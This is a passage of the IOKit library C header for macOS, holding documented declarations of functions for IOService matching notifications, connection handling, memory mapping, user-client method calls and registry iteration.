masterPort, 400 | CFDictionaryRef matching CF_RELEASES_ARGUMENT, 401 | io_iterator_t * existing ); 402 | 403 | 404 | kern_return_t 405 | IOServiceAddNotification( 406 | mach_port_t masterPort, 407 | const io_name_t notificationType, 408 | CFDictionaryRef matching, 409 | mach_port_t wakePort, 410 | uintptr_t reference, 411 | io_iterator_t * notification ) DEPRECATED_ATTRIBUTE; 412 | 413 | /*! @function IOServiceAddMatchingNotification 414 | @abstract Look up registered IOService objects that match a matching dictionary, and install a notification request of new IOServices that match. 415 | @discussion This is the preferred method of finding IOService objects that may arrive at any time. The type of notification specifies the state change the caller is interested in, on IOService's that match the match dictionary. Notification types are identified by name, and are defined in IOKitKeys.h. The matching information used in the matching dictionary may vary depending on the class of service being looked up. 416 | @param notifyPort A IONotificationPortRef object that controls how messages will be sent when the armed notification is fired. When the notification is delivered, the io_iterator_t representing the notification should be iterated through to pick up all outstanding objects. When the iteration is finished the notification is rearmed. See IONotificationPortCreate. 417 | @param notificationType A notification type from IOKitKeys.h 418 |
kIOPublishNotification Delivered when an IOService is registered. 419 |
kIOFirstPublishNotification Delivered when an IOService is registered, but only once per IOService instance. Some IOService's may be reregistered when their state is changed. 420 |
kIOMatchedNotification Delivered when an IOService has had all matching drivers in the kernel probed and started. 421 |
kIOFirstMatchNotification Delivered when an IOService has had all matching drivers in the kernel probed and started, but only once per IOService instance. Some IOService's may be reregistered when their state is changed. 422 |
kIOTerminatedNotification Delivered after an IOService has been terminated. 423 | @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching. 424 | @param callback A callback function called when the notification fires. 425 | @param refCon A reference constant for the callbacks use. 426 | @param notification An iterator handle is returned on success, and should be released by the caller when the notification is to be destroyed. The notification is armed when the iterator is emptied by calls to IOIteratorNext - when no more objects are returned, the notification is armed. Note the notification is not armed when first created. 427 | @result A kern_return_t error code. */ 428 | 429 | kern_return_t 430 | IOServiceAddMatchingNotification( 431 | IONotificationPortRef notifyPort, 432 | const io_name_t notificationType, 433 | CFDictionaryRef matching CF_RELEASES_ARGUMENT, 434 | IOServiceMatchingCallback callback, 435 | void * refCon, 436 | io_iterator_t * notification ); 437 | 438 | /*! @function IOServiceAddInterestNotification 439 | @abstract Register for notification of state changes in an IOService. 440 | @discussion IOService objects deliver notifications of their state changes to their clients via the IOService::messageClients API, and to other interested parties including callers of this function. Message types are defined IOKit/IOMessage.h. 441 | @param notifyPort A IONotificationPortRef object that controls how messages will be sent when the notification is fired. See IONotificationPortCreate. 442 | @param interestType A notification type from IOKitKeys.h 443 |
kIOGeneralInterest General state changes delivered via the IOService::messageClients API. 444 |
kIOBusyInterest Delivered when the IOService changes its busy state to or from zero. The message argument contains the new busy state causing the notification. 445 | @param callback A callback function called when the notification fires, with messageType and messageArgument for the state change. 446 | @param refCon A reference constant for the callbacks use. 447 | @param notification An object handle is returned on success, and should be released by the caller when the notification is to be destroyed. 448 | @result A kern_return_t error code. */ 449 | 450 | kern_return_t 451 | IOServiceAddInterestNotification( 452 | IONotificationPortRef notifyPort, 453 | io_service_t service, 454 | const io_name_t interestType, 455 | IOServiceInterestCallback callback, 456 | void * refCon, 457 | io_object_t * notification ); 458 | 459 | /*! @function IOServiceMatchPropertyTable 460 | @abstract Match an IOService objects with matching dictionary. 461 | @discussion This function calls the matching method of an IOService object and returns the boolean result. 462 | @param service The IOService object to match. 463 | @param matching A CF dictionary containing matching information. IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching. 464 | @param matches The boolean result is returned. 465 | @result A kern_return_t error code. */ 466 | 467 | kern_return_t 468 | IOServiceMatchPropertyTable( 469 | io_service_t service, 470 | CFDictionaryRef matching, 471 | boolean_t * matches ); 472 | 473 | /*! @function IOServiceGetBusyState 474 | @abstract Returns the busyState of an IOService. 475 | @discussion Many activities in IOService are asynchronous. When registration, matching, or termination is in progress on an IOService, its busyState is increased by one. Change in busyState to or from zero also changes the IOService's provider's busyState by one, which means that an IOService is marked busy when any of the above activities is ocurring on it or any of its clients. 476 | @param service The IOService whose busyState to return. 477 | @param busyState The busyState count is returned. 478 | @result A kern_return_t error code. */ 479 | 480 | kern_return_t 481 | IOServiceGetBusyState( 482 | io_service_t service, 483 | uint32_t * busyState ); 484 | 485 | /*! @function IOServiceWaitQuiet 486 | @abstract Wait for an IOService's busyState to be zero. 487 | @discussion Blocks the caller until an IOService is non busy, see IOServiceGetBusyState. 488 | @param service The IOService wait on. 489 | @param waitTime Specifies a maximum time to wait. 490 | @result Returns an error code if mach synchronization primitives fail, kIOReturnTimeout, or kIOReturnSuccess. */ 491 | 492 | kern_return_t 493 | IOServiceWaitQuiet( 494 | io_service_t service, 495 | mach_timespec_t * waitTime ); 496 | 497 | /*! @function IOKitGetBusyState 498 | @abstract Returns the busyState of all IOServices. 499 | @discussion Many activities in IOService are asynchronous. When registration, matching, or termination is in progress on an IOService, its busyState is increased by one. Change in busyState to or from zero also changes the IOService's provider's busyState by one, which means that an IOService is marked busy when any of the above activities is ocurring on it or any of its clients. IOKitGetBusyState returns the busy state of the root of the service plane which reflects the busy state of all IOServices. 500 | @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port. 501 | @param busyState The busyState count is returned. 502 | @result A kern_return_t error code. */ 503 | 504 | kern_return_t 505 | IOKitGetBusyState( 506 | mach_port_t masterPort, 507 | uint32_t * busyState ); 508 | 509 | /*! @function IOKitWaitQuiet 510 | @abstract Wait for a all IOServices' busyState to be zero. 511 | @discussion Blocks the caller until all IOServices are non busy, see IOKitGetBusyState. 512 | @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port. 513 | @param waitTime Specifies a maximum time to wait. 514 | @result Returns an error code if mach synchronization primitives fail, kIOReturnTimeout, or kIOReturnSuccess. */ 515 | 516 | kern_return_t 517 | IOKitWaitQuiet( 518 | mach_port_t masterPort, 519 | mach_timespec_t * waitTime ); 520 | 521 | /*! @function IOServiceOpen 522 | @abstract A request to create a connection to an IOService. 523 | @discussion A non kernel client may request a connection be opened via the IOServiceOpen() library function, which will call IOService::newUserClient in the kernel. The rules & capabilities of user level clients are family dependent, the default IOService implementation returns kIOReturnUnsupported. 524 | @param service The IOService object to open a connection to, usually obtained via the IOServiceGetMatchingServices or IOServiceAddNotification APIs. 525 | @param owningTask The mach task requesting the connection. 526 | @param type A constant specifying the type of connection to be created, interpreted only by the IOService's family. 527 | @param connect An io_connect_t handle is returned on success, to be used with the IOConnectXXX APIs. It should be destroyed with IOServiceClose(). 528 | @result A return code generated by IOService::newUserClient. */ 529 | 530 | kern_return_t 531 | IOServiceOpen( 532 | io_service_t service, 533 | task_port_t owningTask, 534 | uint32_t type, 535 | io_connect_t * connect ); 536 | 537 | /*! @function IOServiceRequestProbe 538 | @abstract A request to rescan a bus for device changes. 539 | @discussion A non kernel client may request a bus or controller rescan for added or removed devices, if the bus family does automatically notice such changes. For example, SCSI bus controllers do not notice device changes. The implementation of this routine is family dependent, and the default IOService implementation returns kIOReturnUnsupported. 540 | @param service The IOService object to request a rescan, usually obtained via the IOServiceGetMatchingServices or IOServiceAddNotification APIs. 541 | @param options An options mask, interpreted only by the IOService's family. 542 | @result A return code generated by IOService::requestProbe. */ 543 | 544 | kern_return_t 545 | IOServiceRequestProbe( 546 | io_service_t service, 547 | uint32_t options ); 548 | 549 | // options for IOServiceAuthorize() 550 | enum { 551 | kIOServiceInteractionAllowed = 0x00000001 552 | }; 553 | 554 | /*! @function IOServiceAuthorize 555 | @abstract Authorize access to an IOService. 556 | @discussion Determine whether this application is authorized to invoke IOServiceOpen() for a given IOService, either by confirming that it has been previously authorized by the user, or by soliciting the console user. 557 | @param service The IOService object to be authorized, usually obtained via the IOServiceGetMatchingServices or IOServiceAddNotification APIs. 558 | @param options kIOServiceInteractionAllowed may be set to permit user interaction, if required. 559 | @result kIOReturnSuccess if the IOService is authorized, kIOReturnNotPermitted if the IOService is not authorized. */ 560 | 561 | kern_return_t 562 | IOServiceAuthorize( 563 | io_service_t service, 564 | uint32_t options ); 565 | 566 | int 567 | IOServiceOpenAsFileDescriptor( 568 | io_service_t service, 569 | int oflag ); 570 | 571 | /* * * * * * * * * * * * * * *ff * * * * * * * * * * * * * * * * * * * * * * */ 572 | 573 | /* 574 | * IOService connection 575 | */ 576 | 577 | /*! @function IOServiceClose 578 | @abstract Close a connection to an IOService and destroy the connect handle. 579 | @discussion A connection created with the IOServiceOpen should be closed when the connection is no longer to be used with IOServiceClose. 580 | @param connect The connect handle created by IOServiceOpen. It will be destroyed by this function, and should not be released with IOObjectRelease. 581 | @result A kern_return_t error code. */ 582 | 583 | kern_return_t 584 | IOServiceClose( 585 | io_connect_t connect ); 586 | 587 | /*! @function IOConnectAddRef 588 | @abstract Adds a reference to the connect handle. 589 | @discussion Adds a reference to the connect handle. 590 | @param connect The connect handle created by IOServiceOpen. 591 | @result A kern_return_t error code. */ 592 | 593 | kern_return_t 594 | IOConnectAddRef( 595 | io_connect_t connect ); 596 | 597 | /*! @function IOConnectRelease 598 | @abstract Remove a reference to the connect handle. 599 | @discussion Removes a reference to the connect handle. If the last reference is removed an implicit IOServiceClose is performed. 600 | @param connect The connect handle created by IOServiceOpen. 601 | @result A kern_return_t error code. */ 602 | 603 | kern_return_t 604 | IOConnectRelease( 605 | io_connect_t connect ); 606 | 607 | /*! @function IOConnectGetService 608 | @abstract Returns the IOService a connect handle was opened on. 609 | @discussion Finds the service object a connection was opened on. 610 | @param connect The connect handle created by IOServiceOpen. 611 | @param service On succes, the service handle the connection was opened on, which should be released with IOObjectRelease. 612 | @result A kern_return_t error code. */ 613 | 614 | kern_return_t 615 | IOConnectGetService( 616 | io_connect_t connect, 617 | io_service_t * service ); 618 | 619 | /*! @function IOConnectSetNotificationPort 620 | @abstract Set a port to receive family specific notifications. 621 | @discussion This is a generic method to pass a mach port send right to be be used by family specific notifications. 622 | @param connect The connect handle created by IOServiceOpen. 623 | @param type The type of notification requested, not interpreted by IOKit and family defined. 624 | @param port The port to which to send notifications. 625 | @param reference Some families may support passing a reference parameter for the callers use with the notification. 626 | @result A kern_return_t error code. */ 627 | 628 | kern_return_t 629 | IOConnectSetNotificationPort( 630 | io_connect_t connect, 631 | uint32_t type, 632 | mach_port_t port, 633 | uintptr_t reference ); 634 | 635 | /*! @function IOConnectMapMemory 636 | @abstract Map hardware or shared memory into the caller's task. 637 | @discussion This is a generic method to create a mapping in the callers task. The family will interpret the type parameter to determine what sort of mapping is being requested. Cache modes and placed mappings may be requested by the caller. 638 | @param connect The connect handle created by IOServiceOpen. 639 | @param memoryType What is being requested to be mapped, not interpreted by IOKit and family defined. The family may support physical hardware or shared memory mappings. 640 | @param intoTask The task port for the task in which to create the mapping. This may be different to the task which the opened the connection. 641 | @param atAddress An in/out parameter - if the kIOMapAnywhere option is not set, the caller should pass the address where it requests the mapping be created, otherwise nothing need to set on input. The address of the mapping created is passed back on sucess. 642 | @param ofSize The size of the mapping created is passed back on success. 643 | @result A kern_return_t error code. */ 644 | 645 | #if !__LP64__ || defined(IOCONNECT_MAPMEMORY_10_6) 646 | 647 | kern_return_t 648 | IOConnectMapMemory( 649 | io_connect_t connect, 650 | uint32_t memoryType, 651 | task_port_t intoTask, 652 | vm_address_t *atAddress, 653 | vm_size_t *ofSize, 654 | IOOptionBits options ); 655 | 656 | #else 657 | 658 | kern_return_t 659 | IOConnectMapMemory( 660 | io_connect_t connect, 661 | uint32_t memoryType, 662 | task_port_t intoTask, 663 | mach_vm_address_t *atAddress, 664 | mach_vm_size_t *ofSize, 665 | IOOptionBits options ); 666 | 667 | #endif /* !__LP64__ || defined(IOCONNECT_MAPMEMORY_10_6) */ 668 | 669 | 670 | /*! @function IOConnectMapMemory64 671 | @abstract Map hardware or shared memory into the caller's task. 672 | @discussion This is a generic method to create a mapping in the callers task. The family will interpret the type parameter to determine what sort of mapping is being requested. Cache modes and placed mappings may be requested by the caller. 673 | @param connect The connect handle created by IOServiceOpen. 674 | @param memoryType What is being requested to be mapped, not interpreted by IOKit and family defined. The family may support physical hardware or shared memory mappings. 675 | @param intoTask The task port for the task in which to create the mapping. This may be different to the task which the opened the connection. 676 | @param atAddress An in/out parameter - if the kIOMapAnywhere option is not set, the caller should pass the address where it requests the mapping be created, otherwise nothing need to set on input. The address of the mapping created is passed back on sucess. 677 | @param ofSize The size of the mapping created is passed back on success. 678 | @result A kern_return_t error code. */ 679 | 680 | kern_return_t IOConnectMapMemory64( 681 | io_connect_t connect, 682 | uint32_t memoryType, 683 | task_port_t intoTask, 684 | mach_vm_address_t *atAddress, 685 | mach_vm_size_t *ofSize, 686 | IOOptionBits options ); 687 | 688 | /*! @function IOConnectUnmapMemory 689 | @abstract Remove a mapping made with IOConnectMapMemory. 690 | @discussion This is a generic method to remove a mapping in the callers task. 691 | @param connect The connect handle created by IOServiceOpen. 692 | @param memoryType The memory type originally requested in IOConnectMapMemory. 693 | @param fromTask The task port for the task in which to remove the mapping. This may be different to the task which the opened the connection. 694 | @param atAddress The address of the mapping to be removed. 695 | @result A kern_return_t error code. */ 696 | 697 | #if !__LP64__ || defined(IOCONNECT_MAPMEMORY_10_6) 698 | 699 | kern_return_t 700 | IOConnectUnmapMemory( 701 | io_connect_t connect, 702 | uint32_t memoryType, 703 | task_port_t fromTask, 704 | vm_address_t atAddress ); 705 | 706 | #else 707 | 708 | kern_return_t 709 | IOConnectUnmapMemory( 710 | io_connect_t connect, 711 | uint32_t memoryType, 712 | task_port_t fromTask, 713 | mach_vm_address_t atAddress ); 714 | 715 | 716 | #endif /* !__LP64__ || defined(IOCONNECT_MAPMEMORY_10_6) */ 717 | 718 | /*! @function IOConnectUnmapMemory64 719 | @abstract Remove a mapping made with IOConnectMapMemory64. 720 | @discussion This is a generic method to remove a mapping in the callers task. 721 | @param connect The connect handle created by IOServiceOpen. 722 | @param memoryType The memory type originally requested in IOConnectMapMemory. 723 | @param fromTask The task port for the task in which to remove the mapping. This may be different to the task which the opened the connection. 724 | @param atAddress The address of the mapping to be removed. 725 | @result A kern_return_t error code. */ 726 | 727 | kern_return_t IOConnectUnmapMemory64( 728 | io_connect_t connect, 729 | uint32_t memoryType, 730 | task_port_t fromTask, 731 | mach_vm_address_t atAddress ); 732 | 733 | 734 | /*! @function IOConnectSetCFProperties 735 | @abstract Set CF container based properties on a connection. 736 | @discussion This is a generic method to pass a CF container of properties to the connection. The properties are interpreted by the family and commonly represent configuration settings, but may be interpreted as anything. 737 | @param connect The connect handle created by IOServiceOpen. 738 | @param properties A CF container - commonly a CFDictionary but this is not enforced. The container should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects. 739 | @result A kern_return_t error code returned by the family. */ 740 | 741 | kern_return_t 742 | IOConnectSetCFProperties( 743 | io_connect_t connect, 744 | CFTypeRef properties ); 745 | 746 | /*! @function IOConnectSetCFProperty 747 | @abstract Set a CF container based property on a connection. 748 | @discussion This is a generic method to pass a CF property to the connection. The property is interpreted by the family and commonly represent configuration settings, but may be interpreted as anything. 749 | @param connect The connect handle created by IOServiceOpen. 750 | @param propertyName The name of the property as a CFString. 751 | @param property A CF container - should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects. 752 | @result A kern_return_t error code returned by the object. */ 753 | 754 | kern_return_t 755 | IOConnectSetCFProperty( 756 | io_connect_t connect, 757 | CFStringRef propertyName, 758 | CFTypeRef property ); 759 | 760 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 761 | 762 | // Combined LP64 & ILP32 Extended IOUserClient::externalMethod 763 | 764 | kern_return_t 765 | IOConnectCallMethod( 766 | mach_port_t connection, // In 767 | uint32_t selector, // In 768 | const uint64_t *input, // In 769 | uint32_t inputCnt, // In 770 | const void *inputStruct, // In 771 | size_t inputStructCnt, // In 772 | uint64_t *output, // Out 773 | uint32_t *outputCnt, // In/Out 774 | void *outputStruct, // Out 775 | size_t *outputStructCnt) // In/Out 776 | AVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER; 777 | 778 | kern_return_t 779 | IOConnectCallAsyncMethod( 780 | mach_port_t connection, // In 781 | uint32_t selector, // In 782 | mach_port_t wake_port, // In 783 | uint64_t *reference, // In 784 | uint32_t referenceCnt, // In 785 | const uint64_t *input, // In 786 | uint32_t inputCnt, // In 787 | const void *inputStruct, // In 788 | size_t inputStructCnt, // In 789 | uint64_t *output, // Out 790 | uint32_t *outputCnt, // In/Out 791 | void *outputStruct, // Out 792 | size_t *outputStructCnt) // In/Out 793 | AVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER; 794 | 795 | kern_return_t 796 | IOConnectCallStructMethod( 797 | mach_port_t connection, // In 798 | uint32_t selector, // In 799 | const void *inputStruct, // In 800 | size_t inputStructCnt, // In 801 | void *outputStruct, // Out 802 | size_t *outputStructCnt) // In/Out 803 | AVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER; 804 | 805 | kern_return_t 806 | IOConnectCallAsyncStructMethod( 807 | mach_port_t connection, // In 808 | uint32_t selector, // In 809 | mach_port_t wake_port, // In 810 | uint64_t *reference, // In 811 | uint32_t referenceCnt, // In 812 | const void *inputStruct, // In 813 | size_t inputStructCnt, // In 814 | void *outputStruct, // Out 815 | size_t *outputStructCnt) // In/Out 816 | AVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER; 817 | 818 | kern_return_t 819 | IOConnectCallScalarMethod( 820 | mach_port_t connection, // In 821 | uint32_t selector, // In 822 | const uint64_t *input, // In 823 | uint32_t inputCnt, // In 824 | uint64_t *output, // Out 825 | uint32_t *outputCnt) // In/Out 826 | AVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER; 827 | 828 | kern_return_t 829 | IOConnectCallAsyncScalarMethod( 830 | mach_port_t connection, // In 831 | uint32_t selector, // In 832 | mach_port_t wake_port, // In 833 | uint64_t *reference, // In 834 | uint32_t referenceCnt, // In 835 | const uint64_t *input, // In 836 | uint32_t inputCnt, // In 837 | uint64_t *output, // Out 838 | uint32_t *outputCnt) // In/Out 839 | AVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER; 840 | 841 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 842 | 843 | kern_return_t 844 | IOConnectTrap0(io_connect_t connect, 845 | uint32_t index ); 846 | 847 | kern_return_t 848 | IOConnectTrap1(io_connect_t connect, 849 | uint32_t index, 850 | uintptr_t p1 ); 851 | 852 | kern_return_t 853 | IOConnectTrap2(io_connect_t connect, 854 | uint32_t index, 855 | uintptr_t p1, 856 | uintptr_t p2); 857 | 858 | kern_return_t 859 | IOConnectTrap3(io_connect_t connect, 860 | uint32_t index, 861 | uintptr_t p1, 862 | uintptr_t p2, 863 | uintptr_t p3); 864 | 865 | kern_return_t 866 | IOConnectTrap4(io_connect_t connect, 867 | uint32_t index, 868 | uintptr_t p1, 869 | uintptr_t p2, 870 | uintptr_t p3, 871 | uintptr_t p4); 872 | 873 | kern_return_t 874 | IOConnectTrap5(io_connect_t connect, 875 | uint32_t index, 876 | uintptr_t p1, 877 | uintptr_t p2, 878 | uintptr_t p3, 879 | uintptr_t p4, 880 | uintptr_t p5); 881 | 882 | kern_return_t 883 | IOConnectTrap6(io_connect_t connect, 884 | uint32_t index, 885 | uintptr_t p1, 886 | uintptr_t p2, 887 | uintptr_t p3, 888 | uintptr_t p4, 889 | uintptr_t p5, 890 | uintptr_t p6); 891 | 892 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 893 | 894 | /*! @function IOConnectAddClient 895 | @abstract Inform a connection of a second connection. 896 | @discussion This is a generic method to inform a family connection of a second connection, and is rarely used. 897 | @param connect The connect handle created by IOServiceOpen. 898 | @param client Another connect handle created by IOServiceOpen. 899 | @result A kern_return_t error code returned by the family. */ 900 | 901 | kern_return_t 902 | IOConnectAddClient( 903 | io_connect_t connect, 904 | io_connect_t client ); 905 | 906 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 907 | 908 | /* 909 | * IORegistry accessors 910 | */ 911 | 912 | /*! @function IORegistryGetRootEntry 913 | @abstract Return a handle to the registry root. 914 | @discussion This method provides an accessor to the root of the registry for the machine. The root may be passed to a registry iterator when iterating a plane, and contains properties that describe the available planes, and diagnostic information for IOKit. 915 | @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port. 916 | @result A handle to the IORegistryEntry root instance, to be released with IOObjectRelease by the caller, or MACH_PORT_NULL on failure. */ 917 | 918 | io_registry_entry_t 919 | IORegistryGetRootEntry( 920 | mach_port_t masterPort ); 921 | 922 | /*! @function IORegistryEntryFromPath 923 | @abstract Looks up a registry entry by path. 924 | @discussion This function parses paths to lookup registry entries. The path should begin with ':' If there are characters remaining unparsed after an entry has been looked up, this is considered an invalid lookup. Paths are further documented in IORegistryEntry.h 925 | @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port. 926 | @param path A C-string path. 927 | @result A handle to the IORegistryEntry witch was found with the path, to be released with IOObjectRelease by the caller, or MACH_PORT_NULL on failure. */ 928 | 929 | io_registry_entry_t 930 | IORegistryEntryFromPath( 931 | mach_port_t masterPort, 932 | const io_string_t path ); 933 | 934 | 935 | /*! @function IORegistryEntryFromPathCFString 936 | @abstract Looks up a registry entry by path. 937 | @discussion This function parses paths to lookup registry entries. The path should begin with ':' If there are characters remaining unparsed after an entry has been looked up, this is considered an invalid lookup. Paths are further documented in IORegistryEntry.h 938 | @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port. 939 | @param path A CFString path. 940 | @result A handle to the IORegistryEntry witch was found with the path, to be released with IOObjectRelease by the caller, or MACH_PORT_NULL on failure. */ 941 | 942 | io_registry_entry_t 943 | IORegistryEntryCopyFromPath( 944 | mach_port_t masterPort, 945 | CFStringRef path ) 946 | #if defined(__MAC_10_11) 947 | __OSX_AVAILABLE_STARTING(__MAC_10_11, __IPHONE_9_0) 948 | #endif 949 | ; 950 | 951 | // options for IORegistryCreateIterator(), IORegistryEntryCreateIterator, IORegistryEntrySearchCFProperty() 952 | enum { 953 | kIORegistryIterateRecursively = 0x00000001, 954 | kIORegistryIterateParents = 0x00000002 955 | }; 956 | 957 | /*! @function IORegistryCreateIterator 958 | @abstract Create an iterator rooted at the registry root. 959 | @discussion This method creates an IORegistryIterator in the kernel that is set up with options to iterate children of the registry root entry, and to recurse automatically into entries as they are returned, or only when instructed with calls to IORegistryIteratorEnterEntry. The iterator object keeps track of entries that have been recursed into previously to avoid loops. 960 | @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port. 961 | @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane. 962 | @param options kIORegistryIterateRecursively may be set to recurse automatically into each entry as it is returned from IOIteratorNext calls on the registry iterator. 963 | @param iterator A created iterator handle, to be released by the caller when it has finished with it. 964 | @result A kern_return_t error code. */ 965 | 966 | kern_return_t 967 | IORegistryCreateIterator( 968 | mach_port_t masterPort, 969 | const io_name_t plane, 970 | IOOptionBits options, 971 | io_iterator_t * iterator ); 972 | 973 | /*! @function IORegistryEntryCreateIterator 974 | @abstract Create an iterator rooted at a given registry entry. 975 | @discussion This method creates an IORegistryIterator in the kernel that is set up with options to iterate children or parents of a root entry, and to recurse automatically into entries as they are returned, or only when instructed with calls to IORegistryIteratorEnterEntry. The iterator object keeps track of entries that have been recursed into previously to avoid loops. 976 | @param entry The root entry to begin the iteration at. 977 | @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane. 978 | @param options kIORegistryIterateRecursively may be set to recurse automatically into each entry as it is returned from IOIteratorNext calls on the registry iterator. kIORegistryIterateParents may be set to iterate the parents of each entry, by default the children are iterated. 979 | @param iterator A created iterator handle, to be released by the caller when it has finished with it. 980 | @result A kern_return_t error code. */ 981 | 982 | kern_return_t 983 | IORegistryEntryCreateIterator( 984 | io_registry_entry_t entry, 985 | const io_name_t plane, 986 | IOOptionBits options, 987 | io_iterator_t * iterator ); 988 | 989 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 990 | 991 | /* 992 | * IORegistryIterator, subclass of IOIterator 993 | */ 994 | 995 | /*! @function IORegistryIteratorEnterEntry 996 | @abstract Recurse into the current entry in the registry iteration. 997 | @discussion This method makes the current entry, ie. the last entry returned by IOIteratorNext, the root in a new level of recursion. 998 | @result A kern_return_t error code. */ 999 | 1000 | kern_return_t 1001 | IORegistryIteratorEnterEntry( 1002 | io_iterator_t iterator ); 1003 | 1004 | /*! @function IORegistryIteratorExitEntry 1005 | @abstract Exits a level of recursion, restoring the current entry. 1006 | @discussion This method undoes an IORegistryIteratorEnterEntry, restoring the current entry. If there are no more levels of recursion to exit false is returned, otherwise true is returned. 1007 | @result kIOReturnSuccess if a level of recursion was undone, kIOReturnNoDevice if no recursive levels are left in the iteration. */ 1008 | 1009 | kern_return_t 1010 | IORegistryIteratorExitEntry( 1011 | io_iterator_t iterator ); 1012 | 1013 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 1014 | 1015 | /* 1016 | * IORegistryEntry, subclass of IOObject 1017 | */ 1018 | 1019 | /*! @function IORegistryEntryGetName 1020 | @abstract Returns a C-string name assigned to a registry entry. 1021 | @discussion Registry entries can be named in a particular plane, or globally. This function returns the entry's global name. The global name defaults to the entry's meta class name if it has not been named. 1022 | @param entry The registry entry handle whose name to look up. 1023 | @param name The caller's buffer to receive the name. 1024 | @result A kern_return_t error code. */ 1025 | 1026 | kern_return_t 1027 | IORegistryEntryGetName( 1028 | io_registry_entry_t entry, 1029 | io_name_t name ); 1030 | 1031 | /*! @function IORegistryEntryGetNameInPlane 1032 | @abstract Returns a C-string name assigned to a registry entry, in a specified plane. 1033 | @discussion Registry entries can be named in a particular plane, or globally. This function returns the entry's name in the specified plane or global name if it has not been named in that plane. The global name defaults to the entry's meta class name if it has not been named. 1034 | @param entry The registry entry handle whose name to look up. 1035 | @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane. 1036 | @param name The caller's buffer to receive the name. 1037 | @result A kern_return_t error code. */ 1038 | 1039 | kern_return_t 1040 | IORegistryEntryGetNameInPlane( 1041 | io_registry_entry_t entry, 1042 | const io_name_t plane, 1043 | io_name_t name ); 1044 | 1045 | /*! @function IORegistryEntryGetLocationInPlane 1046 | @abstract Returns a C-string location assigned to a registry entry, in a specified plane. 1047 | @discussion Registry entries can given a location string in a particular plane, or globally. If the entry has had a location set in the specified plane that location string will be returned, otherwise the global location string is returned. If no global location string has been set, an error is returned. 1048 | @param entry The registry entry handle whose name to look up. 1049 | @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane. 1050 | @param location The caller's buffer to receive the location string. 1051 | @result A kern_return_t error code. */ 1052 | 1053 | kern_return_t 1054 | IORegistryEntryGetLocationInPlane( 1055 | io_registry_entry_t entry, 1056 | const io_name_t plane, 1057 | io_name_t location ); 1058 | 1059 | /*! @function IORegistryEntryGetPath 1060 | @abstract Create a path for a registry entry. 1061 | @discussion The path for a registry entry is copied to the caller's buffer. The path describes the entry's attachment in a particular plane, which must be specified. The path begins with the plane name followed by a colon, and then followed by '/' separated path components for each of the entries between the root and the registry entry. An alias may also exist for the entry, and will be returned if available. 1062 | @param entry The registry entry handle whose path to look up. 1063 | @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane. 1064 | @param path A char buffer allocated by the caller. 1065 | @result IORegistryEntryGetPath will fail if the entry is not attached in the plane, or if the buffer is not large enough to contain the path. */ 1066 | 1067 | kern_return_t 1068 | IORegistryEntryGetPath( 1069 | io_registry_entry_t entry, 1070 | const io_name_t plane, 1071 | io_string_t path ); 1072 | 1073 | /*! @function IORegistryEntryCopyPath 1074 | @abstract Create a path for a registry entry. 1075 | @discussion The path for a registry entry is returned as a CFString The path describes the entry's attachment in a particular plane, which must be specified. The path begins with the plane name followed by a colon, and then followed by '/' separated path components for each of the entries between the root and the registry entry. An alias may also exist for the entry, and will be returned if available. 1076 | @param entry The registry entry handle whose path to look up. 1077 | @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane. 1078 | @result An instance of CFString on success, to be released by the caller. IORegistryEntryCopyPath will fail if the entry is not attached in the plane. */ 1079 | 1080 | CFStringRef 1081 | IORegistryEntryCopyPath( 1082 | io_registry_entry_t entry, 1083 | const io_name_t plane) 1084 | #if defined(__MAC_10_11) 1085 | __OSX_AVAILABLE_STARTING(__MAC_10_11, __IPHONE_9_0) 1086 | #endif 1087 | ; 1088 | 1089 | /*! @function IORegistryEntryGetRegistryEntryID 1090 | @abstract Returns an ID for the registry entry that is global to all tasks. 1091 | @discussion The entry ID returned by IORegistryEntryGetRegistryEntryID can be used to identify a registry entry across all tasks. A registry entry may be looked up by its entryID by creating a matching dictionary with IORegistryEntryIDMatching() to be used with the IOKit matching functions. The ID is valid only until the machine reboots. 1092 | @param entry The registry entry handle whose ID to look up. 1093 | @param entryID The resulting ID. 1094 | @result A kern_return_t error code. */ 1095 | 1096 | kern_return_t 1097 | IORegistryEntryGetRegistryEntryID( 1098 | 